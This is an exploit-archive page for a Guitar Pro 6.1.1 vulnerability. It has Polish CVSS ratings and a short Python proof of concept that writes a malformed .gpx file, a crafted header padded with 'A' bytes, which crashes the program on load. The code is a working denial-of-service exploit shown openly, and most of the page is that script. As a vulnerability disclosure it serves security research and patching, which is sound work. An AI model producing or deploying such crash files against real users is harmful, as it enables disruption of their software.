Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit

2012-05-06 / 2012-11-28
Credit: condis
Risk: Low
Local: Yes
Remote: No
CWE: CWE-400


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

#!/usr/bin/python # --------------------------------------------------------- # Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit # found by condis # # Date : 01 May 2012 AD # Tested on : Windows XP Professional SP3 PL # # Download : http://www.guitar-pro.com/en/index.php # Price : ~60 euro # # Description : # # Each load of malformated file into the program ends up # with crash, but place of crash and registers values # differ every time o_O" # # In my opinion, this bug does not allow for anything else # except getting to a DoS situation, therefore no further # research was done. # --------------------------------------------------------- evil = "BCFZ\x04\x10\x01\x00" evil += "A" * 953 file = open('ogonek_and_cooh_-_not_my_type.gpx', 'w') file.write(evil) file.close() print "Sex, drugs & drum'n'bass!"

Referencje:

http://www.guitar-pro.com/en/index.php
http://cond.psychodela.pl


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top